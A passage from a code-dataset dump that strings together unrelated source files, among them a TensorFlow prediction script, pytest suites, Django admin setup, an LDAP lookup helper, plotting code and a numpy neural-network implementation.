model.cost,\n\t\t\"final_state\": model.final_state,\n\t}\n\tif eval_op is not None: fetches[\"eval_op\"] = eval_op\n\n\tfp = codecs.open(FLAGS.test_path + '.pret','w','utf8');\n\tfor step in range(model.input.epoch_size):\n\t\tfeed_dict = {}\n\t\tfor i, (c, h) in enumerate(model.initial_state):\n\t\t\tfeed_dict[c] = state[i].c\n\t\t\tfeed_dict[h] = state[i].h\n\n\t\tvals = session.run(fetches, feed_dict)\n\t\tcost = vals[\"cost\"]\n\t\tstate = vals[\"final_state\"]\n\t\tinput = [id_to_word[x] for x in vals[\"input\"].reshape(-1)];\n\t\ttargets = [id_to_word[x] for x in vals[\"targets\"].reshape(-1)];\n\t\tprint('loginfo:-----------------------------')\n\t\tprint('input:' + ' '.join(input))\n\t\tprint('target:' + ' '.join(targets))\n#\t\tprint('output:',vals['output'])\n#\t\tprint('prect:',np.fabs(vals['logits']))\n\t\tprint('cost:',cost);\n\t\tcosts += cost\n\t\titers += model.input.num_steps\n\t\tif verbose == False and not id_to_word is None:\n\t\t\twid = vals[\"input\"][0][0];\n\t\t\tmaxids = vals[\"logits\"].argmax(axis = 1);\n\t\t\tprint('input:',wid,id_to_word[wid],' prect:',maxids[0],id_to_word[maxids[0]])\n\t\t\tfp.write(id_to_word[wid] + id_to_word[maxids[0]]);\n\t\t\tif iters % 20 == 0:\n\t\t\t\tfp.write('\\n');\n\tfp.close();\n\treturn np.exp(costs / iters)\n\ndef main(_):\n\tif not FLAGS.test_path:\n\t\traise ValueError(\"Must set --test_path to PTB data directory\")\n\n\tif not FLAGS.vocab_path:\n\t\traise ValueError(\"Must set --vocab_path to PTB data directory\")\n\n\traw_data = reader.djl_raw_data(FLAGS.vocab_path,FLAGS.test_path)\n\ttest_data, test_tag,word_to_id,id_to_word = raw_data\n\n\twith tf.name_scope(\"Test\"):\n\t\ttest_input = PTBInput(config=config, idata=test_data, tdata=test_tag, name=\"TestInput\")\n\t\twith tf.variable_scope(\"Model\"):\n\t\t\tmtest = PTBModel(is_training=False, config=config,input_=test_input)\n\n\tsv = tf.train.Supervisor(logdir=FLAGS.save_path)\n\twith sv.managed_session() as session:\n\t\tif FLAGS.save_path:\n\t\t\tmodel_path = tf.train.latest_checkpoint(FLAGS.save_path);\n\t\t\tprint(model_path);\n\t\t\tload_path = sv.saver.restore(session,model_path);\n\n\t\ttest_perplexity = run_epoch(session, mtest,id_to_word= id_to_word)\n\t\tprint(\"Test Perplexity: %.3f\" % test_perplexity)\n\nif __name__ == \"__main__\":\n\ttf.app.run()\n","sub_path":"script/djl_model_prect.py","file_name":"djl_model_prect.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"349627024","text":"# -*- coding: utf-8 
-*-\n\"\"\"Tests using pytest_resilient_circuits\"\"\"\n\nimport pytest\nfrom mock import patch\nfrom resilient_circuits.util import get_config_data, get_function_definition\nfrom resilient_circuits import SubmitTestFunction, FunctionResult\nfrom .mock_artifacts import mocked_aws_lambda\n\nPACKAGE_NAME = \"fn_aws_utilities\"\nFUNCTION_NAME = \"fn_invoke_lambda\"\n\n# Read the default configuration-data section from the package\nconfig_data = get_config_data(PACKAGE_NAME)\n\n# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)\nresilient_mock = \"pytest_resilient_circuits.BasicResilientMock\"\n\n\ndef call_fn_invoke_lambda_function(circuits, function_params, timeout=5):\n # Create the submitTestFunction event\n evt = SubmitTestFunction(\"fn_invoke_lambda\", function_params)\n\n # Fire a message to the function\n circuits.manager.fire(evt)\n\n # circuits will fire an \"exception\" event if an exception is raised in the FunctionComponent\n # return this exception if it is raised\n exception_event = circuits.watcher.wait(\"exception\", parent=evt, timeout=timeout)\n\n if exception_event is not False:\n exception = exception_event.args[1]\n raise exception\n\n # else return the FunctionComponent's results\n else:\n event = circuits.watcher.wait(\"fn_invoke_lambda_result\", parent=evt, timeout=timeout)\n assert event\n assert isinstance(event.kwargs[\"result\"], FunctionResult)\n pytest.wait_for(event, \"complete\", True)\n return event.kwargs[\"result\"].value\n\n\nclass TestFnInvokeLambda:\n \"\"\" Tests for the fn_invoke_lambda function\"\"\"\n\n def test_function_definition(self):\n \"\"\" Test that the package provides customization_data that defines the function \"\"\"\n func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)\n assert func is not None\n\n # test if handles sum two ints\n mock_inputs_1 = {\n \"lambda_payload\": {\"x\": 1, \"y\": 2},\n \"lambda_function_name\": \"two_int_sum\"\n }\n\n expected_results_1 = '3'\n\n # test if handles strings the same as ints\n mock_inputs_2 = {\n \"lambda_payload\": {\"x\": \"1\", \"y\": \"2\"},\n \"lambda_function_name\": \"two_int_sum\"\n }\n\n expected_results_2 = '3'\n\n mock_inputs_3 = {\n \"lambda_payload\": {\"str1\": \"two\", \"str2\": \"words\"},\n \"lambda_function_name\": \"concat_strings\"\n }\n\n expected_results_3 = \"twowords\"\n\n @patch(\"fn_aws_utilities.components.fn_invoke_lambda.AWSLambda\", side_effect=mocked_aws_lambda)\n @pytest.mark.parametrize(\"mock_inputs, expected_results\", [\n (mock_inputs_1, expected_results_1),\n (mock_inputs_2, expected_results_2),\n (mock_inputs_3, expected_results_3)\n ])\n def test_success(self, mock_aws_lambda, circuits_app, mock_inputs, expected_results):\n \"\"\" Test calling with sample values for the parameters \"\"\"\n\n results = call_fn_invoke_lambda_function(circuits_app, mock_inputs).get(\"response_payload\")\n assert(expected_results == results)\n","sub_path":"fn_aws_utilities/tests/test_funct_fn_invoke_lambda.py","file_name":"test_funct_fn_invoke_lambda.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"418069189","text":"from django.contrib import admin\nfrom dc_app.models import Major,Credential,News\nfrom dc_app.userprofile import Profile\nfrom django.contrib.auth.models import User \n# Register your models here.\n'''\n内容管理系统\n'''\nclass MajorAdmin(admin.ModelAdmin):\n\tlist_display = ('m_name',)\n\nclass 
CredentialAdmin(admin.ModelAdmin):\n\tlist_display = ('c_name','time','search','grade','classes','question')#\n\nclass NewsAdmin(admin.ModelAdmin):\n\tlist_display = ('title','editor')\n\nclass ProfileUnline(admin.TabularInline):\n\tmodel = Profile\n\tverbose_name = '信息'\n\nclass UserAdmin(admin.ModelAdmin):\n\tinlines = (ProfileUnline,)\n\n\nadmin.site.unregister(User)\nadmin.site.register(User,UserAdmin)\nadmin.site.register(Major,MajorAdmin)\nadmin.site.register(Credential,CredentialAdmin)\nadmin.site.register(News,NewsAdmin)\n","sub_path":"dc_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158440903","text":"import numpy as np\n\nimport pytest\n\nfrom sklego.neighbors import BayesianKernelDensityClassifier\nfrom sklego.common import flatten\nfrom sklego.testing import check_shape_remains_same_classifier\nfrom tests.conftest import nonmeta_checks, general_checks, estimator_checks\n\n\n@pytest.fixture()\ndef simple_dataset():\n # Two linearly separable mvn should have a 100% prediction accuracy\n x = np.concatenate(\n [np.random.normal(-10, 1, (100, 2)), np.random.normal(10, 1, (100, 2))]\n )\n y = np.concatenate([np.zeros(100), np.ones(100)])\n return x, y\n\n\n@pytest.mark.parametrize(\n \"test_fn\",\n flatten(\n [\n nonmeta_checks,\n general_checks,\n estimator_checks.check_classifier_data_not_an_array,\n estimator_checks.check_classifiers_one_label,\n estimator_checks.check_classifiers_classes,\n estimator_checks.check_classifiers_train,\n estimator_checks.check_supervised_y_2d,\n estimator_checks.check_supervised_y_no_nan,\n estimator_checks.check_estimators_unfitted,\n check_shape_remains_same_classifier,\n ]\n ),\n)\ndef test_estimator_checks(test_fn):\n test_fn(BayesianKernelDensityClassifier.__name__, BayesianKernelDensityClassifier())\n\n\ndef test_trivial_classification(simple_dataset):\n x, y = simple_dataset\n model = BayesianKernelDensityClassifier().fit(x, y)\n assert (model.predict(x) == y).all()\n","sub_path":"tests/test_estimators/test_neighbor_classifier.py","file_name":"test_neighbor_classifier.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"298654024","text":"from modules import settings\nfrom ldap3 import Server, Connection, ALL, NTLM, ALL_ATTRIBUTES\n\n\ndef ldapSetUp():\n if settings.ldap[\"ldapAvailable\"] is True:\n try:\n directoryServer = Server(settings.ldap[\"ldapServer\"], get_info=ALL, use_ssl=True)\n ldapConnection = Connection(directoryServer, auto_bind=True,\n user=settings.ldap[\"ldapAccessDomain\"] + \"\\\\\" + settings.ldap[\"ldapAccessUserName\"],\n password=settings.ldap[\"ldapAccessPassword\"],\n authentication=NTLM, client_strategy=RESTARTABLE)\n return True, ldapConnection\n except Exception as e:\n print(e)\n print(\"Can't connect to your Active Directory domain! 
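# The sklego test record above drives one test function through a flattened list
# of sklearn-style checks via @pytest.mark.parametrize. A self-contained sketch
# of that pattern with two made-up checks, and sklearn's DummyClassifier standing
# in for the estimator under test.
import pytest
from sklearn.dummy import DummyClassifier

def check_fit_returns_self(name, est):
    assert est.fit([[0.0], [1.0]], [0, 1]) is est

def check_has_predict(name, est):
    assert hasattr(est, "predict")

@pytest.mark.parametrize("test_fn", [check_fit_returns_self, check_has_predict])
def test_estimator_contract(test_fn):
    test_fn(DummyClassifier.__name__, DummyClassifier(strategy="most_frequent"))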
Check your configuration.\")\n return False, None\n else:\n # According to settings.yaml, they didn't want AD anyway.\n return False, None\ndef getStudentName(id):\n searchName = \"s\" + str(id) # adds s so you can search AD by student number...\n ldapConnection.search(settings.ldap[\"ldapSearchBase\"], '(sAMAccountName=' + searchName + ')',\n attributes=ALL_ATTRIBUTES)\n ldapQueryResult = ldapConnection.entries[0] # there shouldn't be more than one entry anyway\n return ldapQueryResult.givenname.value + \" \" + ldapQueryResult.sn.value # first and last name\n\nldapAvailable, ldapConnection = ldapSetUp()","sub_path":"modules/ldapConnect.py","file_name":"ldapConnect.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"433525461","text":"import json\nfrom kombi.Task import Task\n\nclass VendorData(Task):\n \"\"\"\n Implements a task that writes a json file.\n \"\"\"\n\n def _perform(self):\n \"\"\"\n Implement the execution of the task.\n \"\"\"\n crawler = self.crawlers()[0]\n targetFilePath = self.target(crawler)\n\n data = {\n \"vendorVersion\": crawler.var('vendorVersion'),\n \"plateName\": crawler.var('plateName')\n }\n\n with open(targetFilePath, 'w') as f:\n json.dump(data, f)\n\n return super(VendorData, self)._perform()\n\n\n# registering task\nTask.register(\n 'vendorData',\n VendorData\n)\n","sub_path":"data/examples/vendorXPlatesInlineCrawlers/Tasks/VendorData.py","file_name":"VendorData.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"332623020","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Project Templates Module.\"\"\"\n\n\nfrom micropy.project.modules import ProjectModule\nfrom micropy.project.template import TemplateProvider\n\n\nclass TemplatesModule(ProjectModule):\n \"\"\"Project Templates Module.\n\n Generates and manages project files using the Projects\n context.\n\n Args:\n templates (List[str]): List of templates to use.\n run_checks (bool, optional): Whether to execute checks or not.\n Defaults to True.\n\n \"\"\"\n PRIORITY: int = 0\n TEMPLATES = TemplateProvider.TEMPLATES\n\n def __init__(self, templates=None, run_checks=True, **kwargs):\n self.templates = templates or []\n super().__init__(**kwargs)\n self.run_checks = run_checks\n self.enabled = {\n 'vscode': False,\n 'pylint': False\n }\n if templates:\n for key in self.enabled:\n if key in self.templates:\n self.enabled[key] = True\n self.provider = TemplateProvider(\n self.templates, **kwargs)\n\n @property\n def config(self):\n \"\"\"Template config.\n\n Returns:\n dict: Current configuration\n\n \"\"\"\n _config = self.parent.config.get('config', {})\n self.enabled = {**self.enabled, **_config}\n return {\n 'config': self.enabled\n }\n\n def load(self, **kwargs):\n \"\"\"Loads project templates.\"\"\"\n _data = self.config.get('config')\n self.enabled = {**self.enabled, **_data}\n templates = [k for k, v in self.enabled.items() if v]\n self.log.debug(f\"Loading Templates: {templates}\")\n self.provider = TemplateProvider(templates, **kwargs)\n self.update()\n\n def create(self):\n \"\"\"Generates project files.\n\n Returns:\n dict: Project context\n\n \"\"\"\n self.log.title(\"Rendering Templates\")\n self.log.info(\"Populating Stub Info...\")\n for t in self.provider.templates:\n self.provider.render_to(t, self.parent.path, **self.parent.context.raw)\n self.log.success(\"Stubs Injected!\")\n return 
self.parent.context\n\n    def update(self):\n        \"\"\"Updates project files.\n\n        Returns:\n            dict: Project context\n\n        \"\"\"\n        for tmp in self.provider.templates:\n            self.provider.update(tmp, self.parent.path, **self.parent.context.raw)\n        return self.parent.context\n","sub_path":"micropy/project/modules/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"211597182","text":"import copy\n\nimport pkg_resources\nimport pytest\n\nimport gen\n\n\ntrue_false_msg = \"Must be one of 'true', 'false'. Got 'foo'.\"\n\n\ndef validate_helper(arguments):\n    return gen.validate(arguments=arguments)\n\n\n# Plain helper rather than a pytest fixture: validate_error below calls it\n# directly, and calling a fixture-decorated function directly fails under\n# modern pytest.\ndef default_arguments():\n    return copy.deepcopy({\n        'ip_detect_filename': pkg_resources.resource_filename('gen', 'ip-detect/aws.sh'),\n        'bootstrap_id': '123',\n        'exhibitor_zk_path': '/dcos',\n        'master_discovery': 'static',\n        'provider': 'onprem',\n        'exhibitor_zk_hosts': '52.37.205.237:2181',\n        'resolvers': '[\"8.8.8.8\", \"8.8.4.4\"]',\n        'master_list': '[\"52.37.192.49\", \"52.37.181.230\", \"52.37.163.105\"]',\n        'exhibitor_storage_backend': 'zookeeper',\n        'bootstrap_url': 'file:///opt/dcos_install_tmp',\n        'cluster_name': 'Mesosphere: The Data Center Operating System',\n        'bootstrap_variant': '',\n        'oauth_available': 'true',\n        'oauth_enabled': 'true'})\n\n\ndef validate_error(new_arguments, key, message):\n    arguments = default_arguments()\n    arguments.update(new_arguments)\n    expected = {\n        'status': 'errors',\n        'errors': {\n            key: {\n                'message': message\n            }\n        },\n        'unset': set(),\n    }\n    validated = validate_helper(arguments)\n    assert validated['status'] == 'errors'\n    assert validated == expected\n\n\ndef test_invalid_telemetry_enabled():\n    err_msg = \"Must be one of 'true', 'false'. 
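# The helpers above suggest a table-driven variant: the single-key error cases
# repeated in the tests below collapse into one parametrized test. This sketch
# reuses the record's own validate_error and true_false_msg; the three cases are
# lifted from the tests that follow.
import pytest

SINGLE_KEY_CASES = [
    ({'telemetry_enabled': 'foo'}, 'telemetry_enabled', true_false_msg),
    ({'oauth_enabled': 'foo'}, 'oauth_enabled', true_false_msg),
    ({'bootstrap_url': '123abc/'}, 'bootstrap_url', "Must not end in a '/'"),
]

@pytest.mark.parametrize("new_arguments, key, message", SINGLE_KEY_CASES)
def test_single_key_error(new_arguments, key, message):
    validate_error(new_arguments, key, message)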
Got 'foo'.\"\n validate_error(\n {'telemetry_enabled': 'foo'},\n 'telemetry_enabled',\n err_msg)\n\n\ndef test_invalid_ports():\n test_bad_range = '[\"52.37.192.49\", \"52.37.181.230:53\", \"52.37.163.105:65536\"]'\n range_err_msg = \"Must be between 1 and 65535 inclusive\"\n test_bad_value = '[\"52.37.192.49\", \"52.37.181.230:53\", \"52.37.163.105:abc\"]'\n value_err_msg = \"Must be an integer but got a str: abc\"\n\n validate_error(\n {'resolvers': test_bad_range},\n 'resolvers',\n range_err_msg)\n\n validate_error(\n {'resolvers': test_bad_value},\n 'resolvers',\n value_err_msg)\n\n\ndef test_invalid_ipv4():\n test_ips = '[\"52.37.192.49\", \"52.37.181.230\", \"foo\", \"52.37.163.105\", \"bar\"]'\n err_msg = \"Invalid IPv4 addresses in list: foo, bar\"\n validate_error(\n {'master_list': test_ips},\n 'master_list',\n err_msg)\n\n validate_error(\n {'resolvers': test_ips},\n 'resolvers',\n err_msg)\n\n\ndef test_invalid_zk_path():\n validate_error(\n {'exhibitor_zk_path': 'bad/path'},\n 'exhibitor_zk_path',\n \"Must be of the form /path/to/znode\")\n\n\ndef test_invalid_zk_hosts():\n validate_error(\n {'exhibitor_zk_hosts': 'zk://10.10.10.10:8181'},\n 'exhibitor_zk_hosts',\n \"Must be of the form `host:port,host:port', not start with zk://\")\n\n\ndef test_invalid_bootstrap_url():\n validate_error(\n {'bootstrap_url': '123abc/'},\n 'bootstrap_url',\n \"Must not end in a '/'\")\n\n\ndef test_validate_duplicates():\n validate_error(\n {'master_list': '[\"10.0.0.1\", \"10.0.0.2\", \"10.0.0.1\"]'},\n 'master_list',\n 'List cannot contain duplicates: 10.0.0.1 appears 2 times')\n\n\ndef test_invalid_oauth_enabled():\n validate_error(\n {'oauth_enabled': 'foo'},\n 'oauth_enabled',\n true_false_msg)\n\n\ndef test_cluster_docker_credentials():\n validate_error(\n {'cluster_docker_credentials': 'foo'},\n 'cluster_docker_credentials',\n \"Must be valid JSON. Got: foo\")\n\n validate_error(\n {'cluster_docker_credentials_dcos_owned': 'foo'},\n 'cluster_docker_credentials_dcos_owned',\n true_false_msg)\n\n# TODO(cmaloney): Add tests that specific config leads to specific files in specific places at install time.\n","sub_path":"tests/test_gen_validation.py","file_name":"test_gen_validation.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"141612698","text":"\"\"\" Plot catalog comparison\n\"\"\"\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport config\nfrom reader import read_ctlg, slice_ctlg\nfrom statis_lib import calc_fmd\n\n# read & filter catalog\ndef get_mag_ot(ctlg_path):\n events = read_ctlg(ctlg_path)\n events = slice_ctlg(events, mag_rng=mag_rng)\n mag = np.array(list(events['mag']))\n ot = [oti.datetime for oti in events['ot']]\n return mag, ot\n\n\n# catalog info\ncfg = config.Config_Cmp()\nmag_rng = cfg.mag_rng\nctlg_list = cfg.ctlg_list\nmags, ots = [], []\nfor ctlg in ctlg_list:\n magi, oti = get_mag_ot(ctlg)\n mags.append(magi)\n ots.append(oti)\n\n# plot config\nname_list = cfg.name_list\ncolor_list = cfg.color_list\nfig_title_fmd = cfg.fig_title_fmd\nfig_title_mt = cfg.fig_title_mt\nfsize_label = cfg.fsize_label\nfsize_title = cfg.fsize_title\nmark_size = cfg.mark_size\nalpha_fmd = cfg.alpha_fmd\nalpha_mt = cfg.alpha_mt\nmark_num = cfg.mark_num\nmark_cum = cfg.mark_cum\n\n\n# 1. 
plot FMD \nplt.figure()\np_list = []\nfor i in range(len(mags)):\n mag_bin, num, cum_num = calc_fmd(mags[i])\n pi = plt.semilogy(mag_bin, num, mark_num, markersize=mark_size, color=color_list[i], alpha=alpha_fmd)\n pi+= plt.semilogy(mag_bin, cum_num, mark_cum, markersize=mark_size, color=color_list[i], alpha=alpha_fmd)\n p_list.append(pi[0])\nplt.legend(p_list, name_list, fontsize=fsize_label)\nplt.xlabel('Magnitude', fontsize=fsize_label)\nplt.ylabel('Number', fontsize=fsize_label)\nax = plt.gca()\nplt.setp(ax.xaxis.get_majorticklabels(), fontsize=fsize_label)\nplt.setp(ax.yaxis.get_majorticklabels(), fontsize=fsize_label)\nplt.title(fig_title_fmd, fontsize=fsize_title)\n\n# 2. plot M-t\nplt.figure()\nax = plt.gca()\np_list = []\nfor i in range(len(mags)):\n pi = plt.scatter(ots[i], mags[i], color=color_list[i], alpha=alpha_mt)\n p_list.append(pi)\nplt.legend(p_list, name_list, fontsize=fsize_label)\nplt.setp(ax.xaxis.get_majorticklabels(), fontsize=fsize_label, rotation=20)\nplt.setp(ax.yaxis.get_majorticklabels(), fontsize=fsize_label)\nplt.ylabel('Magnitude', fontsize=fsize_label)\nplt.title(fig_title_mt, fontsize=fsize_title)\nplt.show()\n\n","sub_path":"plot_cmp.py","file_name":"plot_cmp.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610771334","text":"import logging\nfrom flask_restful import marshal_with, fields\nfrom flask import request\nfrom api.Auth import Resource\n\nroot_fields = {\n \"uri_data_set\": fields.Url(\"dataSetList\", scheme=\"http\"),\n \"uri_twitter_consumer\": fields.Url(\"twitterConsumerList\", scheme=\"http\"),\n \"uri_data_service\": fields.Url(\"dataServiceList\", scheme=\"http\"),\n \"uri_analysis_options\": fields.Url(\"analyticsOptions\", scheme=\"http\"),\n \"uri_slides\": fields.Url(\"slideList\", scheme=\"http\"),\n \"msg\": fields.String,\n \"healthy\": fields.Boolean\n}\n\n\nclass RootResource(Resource):\n logger = logging.getLogger(__name__)\n\n @marshal_with(root_fields)\n def get(self):\n\n address = request.remote_addr\n return {\"msg\": \"Connected to the GDO Twitter API\", \"healthy\":True}\n","sub_path":"server/src/api/Resources/Root.py","file_name":"Root.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"77770110","text":"from Tkinter import *\n\n\ndef openInstallWindow():\n\tinstallwin = Tk()\n\tinstallwin.wm_title(\"Modification Installer\")\n\tframe = Frame(installwin, height=640, width=480)\n\tframe.pack_propagate(0)\n\tframe.pack(padx=10, pady=10, expand=1)\n\n\t\n\t\n","sub_path":"startMC/Modifdepinstall.py","file_name":"Modifdepinstall.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45905665","text":"import numpy as np\nimport pickle\n# GO ON\ndef xavier_init(size, gain=1.0):\n \"\"\"\n Xavier initialization of network weights.\n \"\"\"\n low = -gain * np.sqrt(6.0 / np.sum(size))\n high = gain * np.sqrt(6.0 / np.sum(size))\n return np.random.uniform(low=low, high=high, size=size)\n\n\nclass Layer:\n \"\"\"\n Abstract layer class.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n raise NotImplementedError()\n\n def forward(self, *args, **kwargs):\n raise NotImplementedError()\n\n def __call__(self, *args, **kwargs):\n return self.forward(*args, **kwargs)\n\n def backward(self, *args, **kwargs):\n raise NotImplementedError()\n\n def 
update_params(self, *args, **kwargs):\n pass\n\n\nclass MSELossLayer(Layer):\n \"\"\"\n MSELossLayer: Computes mean-squared error between y_pred and y_target.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n @staticmethod\n def _mse(y_pred, y_target):\n return np.mean((y_pred - y_target) ** 2)\n\n @staticmethod\n def _mse_grad(y_pred, y_target):\n return 2 * (y_pred - y_target) / len(y_pred)\n\n def forward(self, y_pred, y_target):\n self._cache_current = y_pred, y_target\n return self._mse(y_pred, y_target)\n\n def backward(self):\n return self._mse_grad(*self._cache_current)\n\n\nclass CrossEntropyLossLayer(Layer):\n \"\"\"\n CrossEntropyLossLayer: Computes the softmax followed by the negative log-\n likelihood loss.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n @staticmethod\n def softmax(x):\n numer = np.exp(x - x.max(axis=1, keepdims=True))\n denom = numer.sum(axis=1, keepdims=True)\n return numer / denom\n\n def forward(self, inputs, y_target):\n assert len(inputs) == len(y_target)\n n_obs = len(y_target)\n probs = self.softmax(inputs)\n self._cache_current = y_target, probs\n\n out = -1 / n_obs * np.sum(y_target * np.log(probs))\n return out\n\n def backward(self):\n y_target, probs = self._cache_current\n n_obs = len(y_target)\n return -1 / n_obs * (y_target - probs)\n\n\nclass SigmoidLayer(Layer):\n \"\"\"\n SigmoidLayer: Applies sigmoid function elementwise.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n def forward(self, x):\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self._cache_current = 1/(1 + np.exp(-x))\n\n return self._cache_current\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def backward(self, grad_z):\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n #Differential of the sigmoid function\n self.f_prime = self._cache_current * (1 - self._cache_current)\n grad_loss_wrt_inputs = grad_z * self.f_prime\n\n return(grad_loss_wrt_inputs)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\nclass ReluLayer(Layer):\n \"\"\"\n ReluLayer: Applies Relu function elementwise.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n def forward(self, x):\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self._cache_current = np.maximum(np.zeros_like(x), x)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n return self._cache_current\n\n def backward(self, grad_z):\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Diferential of the Relu function\n self.f_prime = self._cache_current.copy()\n self.f_prime[self.f_prime<0] = 0\n self.f_prime[self.f_prime>0] = 1\n\n grad_loss_wrt_inputs = grad_z * self.f_prime\n 
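# A finite-difference check of the SigmoidLayer backward pass defined above; it
# compares the analytic gradient of sum(forward(x)) with central differences.
# The tolerance and input shape are arbitrary choices.
import numpy as np

def grad_check_sigmoid(eps=1e-6, tol=1e-4):
    layer = SigmoidLayer()
    x = np.random.randn(4, 3)
    layer.forward(x)                            # populates the layer cache
    analytic = layer.backward(np.ones((4, 3)))  # d sum(forward(x)) / dx
    numeric = np.zeros_like(x)
    for idx in np.ndindex(*x.shape):
        xp, xm = x.copy(), x.copy()
        xp[idx] += eps
        xm[idx] -= eps
        numeric[idx] = (layer.forward(xp).sum() - layer.forward(xm).sum()) / (2 * eps)
    assert np.allclose(analytic, numeric, atol=tol)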
#######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n return(grad_loss_wrt_inputs)\n\n\nclass LinearLayer(Layer):\n \"\"\"\n LinearLayer: Performs affine transformation of input.\n \"\"\"\n\n def __init__(self, n_in, n_out):\n \"\"\"Constructor.\n\n Arguments:\n n_in {int} -- Number (or dimension) of inputs.\n n_out {int} -- Number (or dimension) of outputs.\n \"\"\"\n self.n_in = n_in\n self.n_out = n_out\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self._W = np.reshape(xavier_init((self.n_in * self.n_out)), (self.n_in, self.n_out))\n self._b = np.reshape(np.random.randn((self.n_out)), (1, self.n_out))\n\n self._cache_current = None\n self._grad_W_current = None\n self._grad_b_current = None\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def forward(self, x):\n \"\"\"\n Performs forward pass through the layer (i.e. returns Wx + b).\n\n Logs information needed to compute gradient at a later stage in\n `_cache_current`.\n\n Arguments:\n x {np.ndarray} -- Input array of shape (batch_size, n_in).\n\n Returns:\n {np.ndarray} -- Output array of shape (batch_size, n_out)\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self.batch_size = x.shape[0]\n self._cache_current = x\n #Matrix multiplication for to go forward through the linear layer\n return (np.matmul(x, self._W) + self._b)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def backward(self, grad_z):\n \"\"\"\n Given `grad_z`, the gradient of some scalar (e.g. 
loss) with respect to\n the output of this layer, performs back pass through the layer (i.e.\n computes gradients of loss with respect to parameters of layer and\n inputs of layer).\n\n Arguments:\n grad_z {np.ndarray} -- Gradient array of shape (batch_size, n_out).\n\n Returns:\n {np.ndarray} -- Array containing gradient with repect to layer\n input, of shape (batch_size, n_in).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n x = self._cache_current\n\n self._grad_W_current = np.matmul(x.T, grad_z)\n self._grad_b_current = np.matmul(np.ones((1, self.batch_size)), grad_z)\n\n grad_loss_wrt_inputs = np.matmul(grad_z, self._W.T)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n return(grad_loss_wrt_inputs)\n\n def update_params(self, learning_rate):\n \"\"\"\n Performs one step of gradient descent with given learning rate on the\n layer's parameters using currently stored gradients.\n\n Arguments:\n learning_rate {float} -- Learning rate of update step.\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Gradient descent for the weights and bias respectively\n self._W -= learning_rate*self._grad_W_current\n self._b -= learning_rate*self._grad_b_current\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\nclass MultiLayerNetwork(object):\n \"\"\"\n MultiLayerNetwork: A network consisting of stacked linear layers and\n activation functions.\n \"\"\"\n\n def __init__(self, input_dim, neurons, activations):\n \"\"\"Constructor.\n\n Arguments:\n input_dim {int} -- Dimension of input (excluding batch dimension).\n neurons {list} -- Number of neurons in each layer represented as a\n list (the length of the list determines the number of layers).\n activations {list} -- List of the activation function to use for\n each layer.\n \"\"\"\n self.input_dim = input_dim # D\n self.neurons = neurons # L\n self.activations = activations # L\n\n self._layers = [] #list of all the layes\n self.index_linear_layer = [] #position of all the linear layers\n self.feature_list = [self.input_dim] + self.neurons #list of neurons per layer including the input\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n for index, feature in enumerate(self.neurons):\n\n self.index_linear_layer.append(len(self._layers)) #getting the postion of the linear layers\n #Linear layer with the corresponding input and output dimensions\n self._layers.append(LinearLayer(self.feature_list[index],self.feature_list[index+1]))\n\n #Creating the layer instance corresponding to the activation function\n if self.activations[index] == \"relu\":\n self._layers.append(ReluLayer())\n elif self.activations[index] == \"sigmoid\":\n self._layers.append(SigmoidLayer())\n elif self.activations[index] == \"identity\":\n continue\n else:\n raise AssertionError(\"Wrong activation function\")\n #######################################################################\n # ** END OF 